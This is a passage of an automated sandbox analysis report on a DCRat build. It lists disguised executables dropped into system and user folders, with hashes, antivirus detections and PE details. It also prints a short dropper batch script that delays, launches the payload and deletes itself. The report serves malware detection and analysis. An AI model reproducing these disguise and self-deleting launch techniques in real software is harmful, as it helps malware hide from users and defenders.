                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Program Files\7-Zip\Lang\27d1bcfc3c54e0

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (943), with no line terminators
                    Category:dropped
                    Size (bytes):943
                    Entropy (8bit):5.92621778425062
                    Encrypted:false
                    SSDEEP:24:Y0sIyQyW17JXvZmcMi4dGx+Ecu0FwteN1yPYJ/0m:pRFX1ZxmH5d7uNQyPe/T
                    MD5:DAA066EE2168D8641348ECF2A5C6E9CB
                    SHA1:11D96F40A3A580A375F52A8B1BB110CDF731E129
                    SHA-256:84FF715B87C98037DBBCA89FEF08EB2CE2CD21F03BEC59C5DA9898C683971F22
                    SHA-512:C0F45730AA1704DA400DFAA0DA8242771EE01CD1F57937B7F247EDAED1E50C8295F2DDB41081191BA75EB8512EA0688EE1E1C46C257FD43A4874B834B18A1BEC
                    Malicious:false
                    Preview:gCr5NAACVVEFDubMhOndy8uD3Kns1wwMcmDMRcDV0SD8zWQehAHviwIhSoBDWRKjj1narP4ELSnf4vNg3JL1oAoqef4naA8jHdZ8t0wRFCkQJmmgafJNFS4iM65MURnLTDYbVPxDW3wlaYh22XM51ueyi1vw4j7yZZ6FOLLLrF0LgTIxZDU7ErTjjj2edAJw67MBcbnqMANv3SRPt7X0P9trFWgoTrrr6EOjGGV7anvEeipQRmugmTh7Of6F58WeTgzzEsJmmaalOpNgrPXr6LEmgRUlKPBbRQu7szMidI4M25tjRZYqlpiHbMSwYhcWZ8U74Py1CyNyR2ulivTv1U0lrmfghaK5qhx3kvoClhnwbu0jcrOmOqfEItPRtRUmoSItF0BxHRKTrDJ7w6DzLir9Bsu1fXSTMBIJmGdmqaf6gLXFjSfwNeaFkIsWFJRt81Hp5AUpcbJvDudzVpRM2fFskCjdYHggJv8pErKj8zTwUpCzp2AZ2F1cvZF2a1QV5nlRwxvofsOCLTX59tygGGnD3g3plRIGj81rDvD1GW4K0zQcBK2qCtPy9iXP4GCOjHdNbp1Oq6ZuMdMEPanbYbDzsDrfXx7ATpltVCBWSnAGUflgVSAdckzHDofY8V129Zag2dsMZRJub7fNbKKExdis0eprhmX6wIG4EEo1kyELbEqGIS6yLwFg1sqYxBox4M8T0kIWfSe9ZXQvxjiPpjv9CkDWYQDiJQRPGWPiJjS2SGHeb4kOcYHUb8QQgv8PP5zIFBpaUAGFQ2r6dj5eqzGuJ6yHG8BXlCnWQ8YZOJ3bSBDiRUx70eiZyF9JNiUW8seOPVpeLfPh5obH2P0wLEgHeNhL9OLqyhdkhzT5oTvUOBdKn1R8rhK3LWtBxde7UjsYL1jC54H1TM2cuXiH6N8QWkYKFSILyyApSF8vSPCxZTk

                    C:\Program Files\7-Zip\Lang\System.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\Default\Videos\d08fa8653d53e7

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (887), with no line terminators
                    Category:dropped
                    Size (bytes):887
                    Entropy (8bit):5.903762018020118
                    Encrypted:false
                    SSDEEP:24:hiyKycI9cQd3S9qMVo38I1sDS2eXcO2xkkq736uwCc+n:ZKI+03S9qMVg8EHcO2xkkS6/7o
                    MD5:F1CD3ADBC85B40D51CCA1B157EE54283
                    SHA1:D64F1B485974599083A6FAB9900C3865D27A3F25
                    SHA-256:CD2FE6596E4942A53134C467E44E155CDF781E092B304AC993FC02A2A3944CFD
                    SHA-512:51E627D3D297BD42A380AC06C259412AF52C055275C763B7496EB5E9B3B5B287814145D0C398B78F1EAA8D3746D78DE51D0E981056D2AAC20B9483A5C15CB51A
                    Malicious:false
                    Preview:eQd3lm59JwA2ofQHOKu62Gj0hQyXKDj2MEergTVHnuj3uxZ7FooVOwAXrmWUyhzFMHqkAil5ynTHgqGt00SgZOoZDGA46ASG5eqmHz6hCthkd21Bfnd7OSq8dQg3iq8yUNMCAdlB3udqrD6LP8YTgV1myrI1TD8WutQQqyBCBcDez9RaTVojSpR9VkOSUur0wH58xqea7WRERXxyZsh8ZYDFbQ4GksrRuNrrETnm0Nl6XNs8wa2mMtbXDzggwY0PoATDpFtGF4HLwHsOi5TKzEFBvUnPwG0cWWRX4oTrqwhRlPk6HS80Eqak4RSVbeT8EpyazVT4mmdChxZgtrIeH9Xq6rcmW7PMciM6aKHw8ENcNXDH1vluVz1ESIeH2rhoWQk8kdFjjWgDv4dioVukWe0nrIoSp93RgiF7xEgYqCK9TxSXp5ch67S1Z6Qczx3jcPgMzfvkzW4UU0U3zQmtgWUjQNh0yDj3IlhERFiJK2sjD8himWniKJCG476l84vvxBLsTQmtsdjonugRq9ObaAs9iaJUJ6LQG6wBxyOVu3zrkYcJao59pUVwSMK2GSkwSShr8ee1u3rgLBYJ893eBMlwl9tkoVObTDZS1vL6JEOwnylQxB4GYFuFquF8v4NYoPMHmGRNy7U77zJwYcwmbICOSTlHpNKP10IXmdortrSbuxI1lTkSHk7gM8zTeKhlwEGGrvK4yE3tzldeKtfWm2IQ3lKnnUNiKqoqrBKzIpeCrNqlfVIuoL846zNFkgQd1UjI6wwIjqN7XGjp5jISMd39suu2xFOlZBKWohosi9K87BgzPiJBY7QYakaMC4VeblhW5NBX5ZuMS5BqN4nP5NNbuw6DGbpooqhVdK4CgvG9NEGfiu9IQFi

                    C:\Users\Default\Videos\dfVXJbANbh.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\Public\Music\d08fa8653d53e7

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):131
                    Entropy (8bit):5.566116394499032
                    Encrypted:false
                    SSDEEP:3:FMKnZRYyj8lkT3PHluJO9jxNxKGNigMovOqtvXfcMXWRVy8mn:2mR78SfHluMjxNM9g/vXtPuvm
                    MD5:DE9A815F6170B335D7E0C21A02A36A41
                    SHA1:E17D42E7A05A3387A36CAD9AB944A9B504EC78F2
                    SHA-256:3D6E550A79E3ADB9CC4B64F0D021723D83F02DCC672EA6E43F75BBED11F9FF67
                    SHA-512:08E785E3E058B4491D6E58B58EC99CC9F275D2E3455CE1B85422474B50C8B4CD8402E855C0F8A20846B47359B6B0C56F70361B91380FD9F34AC7768F7A3E754A
                    Malicious:false
                    Preview:dHjtiolbqDnwIsKT3yV6CmiFhoCA4WZNVuPJAWeqdp83HTFkybAIRwE0jeM3lkhTnaaXdBThTocXoo8NicMcWR5iqYjgJkF3HoQr2rHxIcymTrM5f8UJXE7Ve2rEbwYsjjP

                    C:\Users\Public\Music\dfVXJbANbh.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                    Download File
                    Process:C:\Program Files\7-Zip\Lang\System.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):1281
                    Entropy (8bit):5.370111951859942
                    Encrypted:false
                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfVXJbANbh.exe.log

                    Download File
                    Process:C:\Users\Default\Videos\dfVXJbANbh.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):1281
                    Entropy (8bit):5.370111951859942
                    Encrypted:false
                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\portperf.exe.log

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):1740
                    Entropy (8bit):5.36827240602657
                    Encrypted:false
                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                    MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                    SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                    SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                    SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                    C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):206
                    Entropy (8bit):5.069442451279302
                    Encrypted:false
                    SSDEEP:3:mKDDBEIFK+KdTVpM3No+HK9ATScyW+jn9mbZjWMlaAEyBktKcKZG1N+E2J5xAIcD:hITg3Nou11r+DERdEyKOZG1N723fcQc
                    MD5:DA9767EBCD67A1C7979C932F6427E6E3
                    SHA1:8698DF0E761302445ABB087618D64FE277954CC8
                    SHA-256:57BBF4696CBEFAEBED13721F81B193CAABBFDE44A85CBADB20937F8A55367AC0
                    SHA-512:524938BFD7F5CB776BAC9220442BF7C9FD89AAF815DF27FFAAECFA6D0E770CF85F2B75864FBBC9FCEB14AFD77D9CBDA17330C6CB25849F1044D4AF393596CF0B
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Program Files\7-Zip\Lang\System.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\LHgpusyvSo.bat"

                    C:\Users\user\AppData\Local\Temp\p0UyIgWlzy

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):25
                    Entropy (8bit):4.323856189774724
                    Encrypted:false
                    SSDEEP:3:m/Cq4BC:PC
                    MD5:39045EA024CA14F48C2F37C6A2702FF0
                    SHA1:CCDFF6A9664860E1F940FE839B1C3B985FC3561E
                    SHA-256:25FAA16A0543531D44A5CD33CC52CB544247DD34C4A983748704FCC4F5AD9F27
                    SHA-512:B9D6077ADF267FC0B40A879ECB06AEBFC8DB5C937C1CAAC464656EB1F6EB988E2E15901DC0EFA9DE56F17AC274847B5C96901778115F8D52061C07636A0E9088
                    Malicious:false
                    Preview:IQTlqZr73C1DbFSBxqCxHpb6g

                    C:\Windows\SystemTemp\Crashpad\9e8d7a4ca61bd9

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):271
                    Entropy (8bit):5.798029692736424
                    Encrypted:false
                    SSDEEP:6:MefOpGl3WqjcplHBBkVYiH1Zs3nKif76cZkCFFXWMvUdI:M63WXhyVYiVZsXKiloVS
                    MD5:337B24792391CD5717086EBDBBD54C72
                    SHA1:02CDEAD8F73FEAFD9E270358D1F7B73FCCC5042D
                    SHA-256:7050793E679134139DB57700C5A33CE4CB1F9748CA183730F727FBB4BA822601
                    SHA-512:D861CF7E35206AE7AB1793661C2C209643008392B3B3285D61544548398F455858D12980C9AD21BADB42981486DD0B98163306C6B7F105F111FB00B3D6009C37
                    Malicious:false
                    Preview:qpKxT6em19xRHaChhCO5ux679ceuRVl3YF0cUv33IloQMgYdWPRMnBf2sNx1ctVgX32CjjNvJUwJJpudDBXCDZPXj8tG7BbYQH3SnW3xCgDSOWtCcUyaWTd8ofclzHxH3Y2BwczrIk9hW6INPrnnNAB7o5oH3R75s5Z0drQAfGSwT6mrXPWIdK33W5W1ysx0mEzahSthanHHsPosT6un5ybhCgdhUYLwSbKOHLJEfys0CwKHRoi17K4xnRXByMMBbVyQEZkHwpIHGle

                    C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    \Device\Null

                    Download File
                    Process:C:\Windows\System32\w32tm.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):151
                    Entropy (8bit):4.753396717438364
                    Encrypted:false
                    SSDEEP:3:VLV993J+miJWEoJ8FXpmSvYQFy6vrBV8qXKNvj:Vx993DEUGmcYQDeV
                    MD5:32C6663B7C9103A04438C57E6A2FB9DF
                    SHA1:8FECF12DEB24DC80D28F972D2CE5FAAF74FD5834
                    SHA-256:00911D6B423154727AFD9ECBB42FDDD754F36EDF7B4EA0BE0C2DC0005DAB6115
                    SHA-512:0368F34E73DCC3C58E479076BE5B126FF02E25DA82739A861E302A43395B5FC935642F72406CCCD86A90A3983BF9BC0754C016F800161EE416CCA80F109918C9
                    Malicious:false
                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 22/11/2024 21:30:11..21:30:11, error: 0x80072746.21:30:16, error: 0x80072746.

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.374969486082851
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    • Win32 Executable (generic) a (10002005/4) 49.97%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:DCRatBuild.exe
                    File size:1'165'973 bytes
                    MD5:a92e55e04cc2026f53c97bdf0e91f6ba
                    SHA1:a31af958d3f885e0f55465acc214bdb0d56e672f
                    SHA256:f395305daac1c6e8fd577b85bc9132b5358c9e4c4b818b61f76d50d2477a3906
                    SHA512:441ca291ccc66f16b5252d65c23fb9f0a57f242ca35f196f41175e2c4d3adc436b026111b79fb4c77db9dbe6370e837133c1d02e571730831293e0a1ffeb95a9
                    SSDEEP:24576:U2G/nvxW3Ww0t43eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7d:UbA3042rejxtDydhcQ
                    TLSH:324538017E418A11F4191233C2EF894447B5AC512AE6F32B7EBE376D95223937D1EACB
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                    File Icon

                    Icon Hash:1515d4d4442f2d2d

                    Static PE Info

                    General

                    Entrypoint:0x41ec40
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                    Entrypoint Preview

                    Instruction
                    call 00007FDDD0F76F89h
                    jmp 00007FDDD0F7699Dh
                    cmp ecx, dword ptr [0043E668h]
                    jne 00007FDDD0F76B15h
                    ret
                    jmp 00007FDDD0F7710Eh
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    push esi
                    push dword ptr [ebp+08h]
                    mov esi, ecx
                    call 00007FDDD0F698A7h
                    mov dword ptr [esi], 00435580h
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    and dword ptr [ecx+04h], 00000000h
                    mov eax, ecx
                    and dword ptr [ecx+08h], 00000000h
                    mov dword ptr [ecx+04h], 00435588h
                    mov dword ptr [ecx], 00435580h
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    lea eax, dword ptr [ecx+04h]
                    mov dword ptr [ecx], 00435568h
                    push eax
                    call 00007FDDD0F79CADh
                    pop ecx
                    ret
                    push ebp
                    mov ebp, esp
                    sub esp, 0Ch
                    lea ecx, dword ptr [ebp-0Ch]
                    call 00007FDDD0F6983Eh
                    push 0043B704h
                    lea eax, dword ptr [ebp-0Ch]
                    push eax
                    call 00007FDDD0F793C2h
                    int3
                    push ebp
                    mov ebp, esp
                    sub esp, 0Ch
                    lea ecx, dword ptr [ebp-0Ch]
                    call 00007FDDD0F76AB4h
                    push 0043B91Ch
                    lea eax, dword ptr [ebp-0Ch]
                    push eax
                    call 00007FDDD0F793A5h
                    int3
                    jmp 00007FDDD0F7B3F3h
                    jmp dword ptr [00433260h]
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push 00421EB0h
                    push dword ptr fs:[00000000h]

                    Rich Headers

                    Programming Language:
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [C++] VS2015 UPD3.1 build 24215
                    • [EXP] VS2015 UPD3.1 build 24215
                    • [RES] VS2015 UPD3 build 24213
                    • [LNK] VS2015 UPD3.1 build 24215

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

